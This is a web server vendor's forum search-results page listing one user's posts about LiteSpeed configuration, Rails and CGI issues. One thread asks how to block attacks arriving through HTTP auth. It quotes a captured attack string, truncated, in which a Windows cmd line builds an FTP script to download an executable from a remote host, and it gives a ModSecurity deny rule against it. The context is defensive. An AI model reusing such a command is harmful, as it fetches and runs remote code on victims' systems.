Download
Blog
Wiki
Forum
Store
Contact
Home
Products
Web Server
Load Balancer
LiteSpeed SAPI
Solutions
Web Hosting
Online Gaming
PHP Application
Rails Hosting
Case Studies
Resources
Documentation
White Papers
Benchmarks
Testimonials
FAQ
HOW-TOs
Support
Services
Wiki
Forum
Company
About
News
Blog
Management
Partners
Careers
Support
Services
Wiki
Forum
User Name
Password
Remember Me?
Register
FAQ
Members List
Calendar
Search
Today's Posts
Mark Forums Read
LiteSpeed Support Forums
>
Search Forums
>
Search Results
Showing results 1 to 20 of 20 - Search took
0.00
seconds.
Search:
Posts Made By:
kule
Forum:
Install/Configuration
02-08-2011, 04:28 PM
Replies:
4
Filtering Hack Attempts Via Http Auth
Views:
1,324
Posted By
kule
Ok so if I read this right something like: ...
Ok so if I read this right something like:
SecRule REMOTE_USER "rewetsr" log,deny,status:403
Forum:
Install/Configuration
02-05-2011, 12:24 AM
Replies:
4
Filtering Hack Attempts Via Http Auth
Views:
1,324
Posted By
kule
I was using SecFilter "rewetsr" This is...
I was using
SecFilter "rewetsr"
This is the command that was coming through (after a load of unicode characters):
cmd /c echo open 1.1.1.1 21 > o&echo user 1 1 >> o &echo get rewetsr.exe >>...
Forum:
Install/Configuration
02-04-2011, 05:40 AM
Replies:
4
Filtering Hack Attempts Via Http Auth
Views:
1,324
Posted By
kule
Filtering Hack Attempts Via Http Auth
Is there a way I can filter attempts to hack via http auth? I'm getting http auth requests which are trying to use SQL Injection with the login/username.
It's not getting anywhere but I would like...
Forum:
Feedback/Feature Requests
03-20-2010, 03:09 AM
Replies:
0
Minor Improvements to Admin Interface
Views:
1,380
Posted By
kule
Minor Improvements to Admin Interface
Couple of ideas that I think would be beneficial to the everyday usage of the admin interface:
1) When you change the configuration it notifies you "Configuration has been modified. To apply...
Forum:
Feedback/Feature Requests
03-01-2010, 02:13 AM
Replies:
2
[RESOLVED] Memory Limit for VPS License
Views:
1,633
Posted By
kule
Thanks very much mistwang :)
Thanks very much mistwang :)
Forum:
Feedback/Feature Requests
02-28-2010, 09:59 AM
Replies:
2
[RESOLVED] Memory Limit for VPS License
Views:
1,633
Posted By
kule
[RESOLVED] Memory Limit for VPS License
Out of curiosity how come there is now a 1.5Gb memory limit for the VPS leased license? Does this mean it will only use 1.5Gb of memory or it will cease to work on a system with more memory?
...
Forum:
Install/Configuration
02-26-2010, 12:29 AM
Replies:
4
[RESOLVED] Setting up SSI
Views:
1,006
Posted By
kule
@anewday apologies for my perceived lack of...
@anewday apologies for my perceived lack of patience
@mistwang thank you again; figured it out from what you said:
Go to the conf folder of your litespeed installation directory e.g.
cd...
Forum:
Install/Configuration
02-25-2010, 02:03 PM
Replies:
4
[RESOLVED] Setting up SSI
Views:
1,006
Posted By
kule
It's all a bit quiet...is my question that dumb...
It's all a bit quiet...is my question that dumb or does nobody know? :)
I know you used to have to pass over requests to Apache but I'm pretty sure I read that you can now process SSI with version...
Forum:
Install/Configuration
02-25-2010, 05:43 AM
Replies:
4
[RESOLVED] Setting up SSI
Views:
1,006
Posted By
kule
[RESOLVED] Setting up SSI
Probably simple but couldn't see the answer anywhere:
How do I setup SSI to process .shtml files for say the PHP_SuEXEC virtual host template?
Thanks
Luke
Forum:
Install/Configuration
02-23-2010, 07:55 AM
Replies:
7
Upgrate to 4.0.13 download failed
Views:
1,366
Posted By
kule
Thanks NiteWave thats just what I was looking for...
Thanks NiteWave thats just what I was looking for - any chance of adding these instructions to the upgrade part of the install/upgrade docs? (http://litespeedtech.com/docs/webserver/install/)
Forum:
Ruby/Rails
12-03-2009, 03:38 AM
Replies:
8
Rack 1.0.1 don't works god with litespeed
Views:
3,816
Posted By
kule
I haven't tried this yet - will be trying shortly...
I haven't tried this yet - will be trying shortly though.
Just wanted to mention that the latest version of Rails (2.3.5) has a dependency of Rack 1.0.1 so this will need a fix.
LiteSpeed staff...
Forum:
Install/Configuration
06-25-2009, 02:14 AM
Replies:
5
4.0.4/4.05 symlink issues
Views:
1,189
Posted By
kule
Thanks mistwang, I should have added that I...
Thanks mistwang,
I should have added that I also had the same issue with:
Security -> Password File Realm Definition -> User DB Location
Not sure if this would apply too?
Thanks
Luke
Forum:
Install/Configuration
06-23-2009, 01:18 AM
Replies:
5
4.0.4/4.05 symlink issues
Views:
1,189
Posted By
kule
Thanks for the quick reply mistwang - I collapsed...
Thanks for the quick reply mistwang - I collapsed in bed as it was about 3am my time when I posted that!
If you could let me know if this is going to stay like this or change back to how it used...
Forum:
Install/Configuration
06-22-2009, 07:00 PM
Replies:
5
4.0.4/4.05 symlink issues
Views:
1,189
Posted By
kule
4.0.4/4.05 symlink issues
I upgraded from 3.x tonight but I'm having issues with a virtual host template that uses symlinks
The vh_root is like this:
/home/sites/public_html/site1/public/$VH_ NAME
public is a symlink...
Forum:
Ruby/Rails
03-18-2009, 07:23 AM
Replies:
23
Will there be official support for Rails >= 2.3
Views:
7,289
Posted By
kule
Oh just to add - remember that we're using a...
Oh just to add - remember that we're using a regular expression to find the version. If it can't find the constant we're after rails_ver will end up being nil (similar to null in most other...
Forum:
Ruby/Rails
03-18-2009, 07:21 AM
Replies:
23
Will there be official support for Rails >= 2.3
Views:
7,289
Posted By
kule
Yep looks good to me.
Yep looks good to me.
Forum:
Ruby/Rails
03-18-2009, 06:45 AM
Replies:
23
Will there be official support for Rails >= 2.3
Views:
7,289
Posted By
kule
Based on running in the rails root: ...
Based on running in the rails root:
environmentrb = File.read('config/environment.rb')
puts $1 if environmentrb =~ /^[^#]*RAILS_GEM_VERSION\s*=\s*["']([!~<>=]*\s*[\d.]+)["']/
If you have...
Forum:
Ruby/Rails
03-18-2009, 03:40 AM
Replies:
23
Will there be official support for Rails >= 2.3
Views:
7,289
Posted By
kule
If I can help I will - what exactly are you...
If I can help I will - what exactly are you after? Some additions to the github code above? e.g. do you just want to do something like
if RAILS_GEM_VERSION >= 2.3.2
# use rack
else
# use...
Forum:
CGI/Perl/Python
10-05-2008, 02:31 AM
Replies:
4
lscgid: execve(): Permission denied
Views:
7,290
Posted By
kule
Doh thats got it - thanks very much!
Doh thats got it - thanks very much!
Forum:
CGI/Perl/Python
10-04-2008, 11:30 AM
Replies:
4
lscgid: execve(): Permission denied
Views:
7,290
Posted By
kule
lscgid: execve(): Permission denied
Hi There,
I'm trying to setup a site that uses a simple perl script:
#!/usr/bin/perl
use LWP::Simple;
print "Content-type: text/html\n\n";
Showing results 1 to 20 of 20
Forum Jump
User Control Panel
Private Messages
Subscriptions
Who's Online
Search Forums
Forums Home
General
News
Use Cases
LiteSpeed Web Server
General
Install/Configuration
LiteSpeed Cache
Feedback/Feature Requests
Bug Reports
LSWS 4.1 Release
LiteSpeed Load Balancer
General
LiteSpeed Anti-DDoS
Proxy Service
Popular web applications
Word Press
vBulletin Forum
Joomla
Magento
External Applications
Apache Migration/Compatibility
Ruby/Rails
PHP
CGI/Perl/Python
Java JSP/Servlet
All times are GMT -7. The time now is
04:29 AM
.
-
Archive
-
Top
© Copyright 2003-2011 LiteSpeed Technologies, Inc. All rights reserved.
Privacy Policy
.